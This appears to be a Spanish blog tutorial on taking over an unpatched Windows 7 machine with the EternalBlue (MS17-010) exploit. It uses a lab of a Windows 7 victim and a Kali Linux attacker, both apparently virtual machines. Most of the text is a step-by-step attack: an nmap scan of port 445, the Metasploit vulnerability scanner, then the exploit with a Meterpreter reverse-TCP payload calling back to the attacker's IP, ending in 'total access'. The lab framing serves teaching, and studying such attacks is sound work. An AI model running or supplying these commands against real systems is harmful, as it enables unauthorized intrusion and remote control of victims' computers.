En este tutorial nos haremos con el control de una máquina con windows 7 sin autorización por su parte. Obviamente, esto se debe de hacer sólo con fines educativos, para que podáis ver lo fácil que es hackear un pc con Windows 7 y así tomar las precauciones necesarias para protegeros de los ciberdelincuentes.
Si después de conseguir vulnerar Windows 7 conocéis a alguien que todavía use este sistema operativo, corred a avisarle para que actualice rápidamente su windows a una versión mas reciente.
Para este tutorial necesitamos dos máquinas:
- Una máquina con Windows 7 (Máquina víctima)
- Una máquina con Kali Linux (Máquina atacante)
El cómo tengáis dichas máquinas es indiferente, pero os pongo ejemplos de como pódeis tener las dos:
- Un PC con windows 10 u 11, y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7
- Un PC con Kali Linux y una máquina virtual de windows 7
- Un PC con cualquier otra distribución de Linux y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7
- Un Mac y dos máquinas virtuales corriendo simultáneamente, una con Kali Linux y otra con Windows 7… etc
Para empezar, ejecutamos nuestra máquina virtual con Windows 7 y miramos que ip tiene.
Para ello, lanzamos el cmd (tecla windows y buscamos “cmd”) y escribimos ipconfig
Ahora desde nuestro Kali, seguiremos estos pasos:
Escanear si el puerto de SMB está abierto
Lo primero que tenemos que hacer es ver si el puerto de SMB está abierto:
- Lanzamos un nmap para comprobar que tiene el puerto 445 abierto con: (hay que susituir las 3 x por la ip del windows)
nmap -T4 -O 192.168.10.xxx
- Esto nos dará entre otros datos si el puerto de SMB está activo o no. Si está activo nos dará una salida similar a esta:
Escanear si el equipo es vulnerable
Una vez hemos visto que el puerto está abierto, veremos si además es vulnerable.
- En la terminal abrimos metasploit con el comando que te pongo a continuación.
msfconsole -q
Sabremos que hemos entrado en metasploit porque en vez de mostrar la linea de comandos normal, pondrá msf6 > como se ve en la imagen:
- Dentro de metasploit, buscamos el exploit que explota esta vulnerabilidad, que se llama eternalblue. Para ello ejecutaremos el comando
search eternal
y nos aparecerá algo así:
- Ahora ponemos el comando que activa el escaner para saber si el equipo es vulnerable o no:
use auxiliary/scanner/smb/smb_ms17_010
- En el siguiente paso tenemos que elegir el host al que vamos a atacar. En este caso la maquina de windows 7 vulnerable tiene la dirección IP 192.168.1.124 y es la que sacamos en el paso anterior en la máquina de Windows 7 con ipconfig.
Para elegir el host remoto lo hacemos con el comando:set RHOSTS 192.168.1.124
Recuerda que todos los pasos los estamos haciendo en KALI LINUX - Si ahora ejecutamos el exploit nos dirá si el equipo es vulnerable o no. Lo ejecutamos con el comando:
exploit
Solo nos dirá si es vulnerable ya que elegimos el exploit que era un escaner: auxiliary/scanner/smb/smb_ms17_010 Sabremos si es vulnerable si obtenemos este mensaje:
Si nos ha dado que es vulnerable, pasaremos al siguiente paso.
Explotar la vulnerabilidad
Ahora tenemos que seleccionar otro exploit: el que va a explotar la vulnerabilidad.
- Para ello volvemos hacia atras para poder salir del auxiliary/scanner… Lo hacemos con el comando:
back
- Y ahora seleccionamos el exploit eternalblue. Lo seleccionamos con:
use exploit/windows/smb/ms17_010_eternalblue
- Volveremos a elegir el HOST al que vamos a atacar:
set RHOSTS 192.168.1.124
- y elegimos que payload usaremos después de explotar la vulnerabilidad con:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
- Colocamos nuestra ip (la de nuestra máquina con Kali) con:
set LHOST 192.168.1.35
- y lanzamos el exploit con:
exploit -j
Una vez hecho esto, tendrás acceso total a windows 7
0 comentarios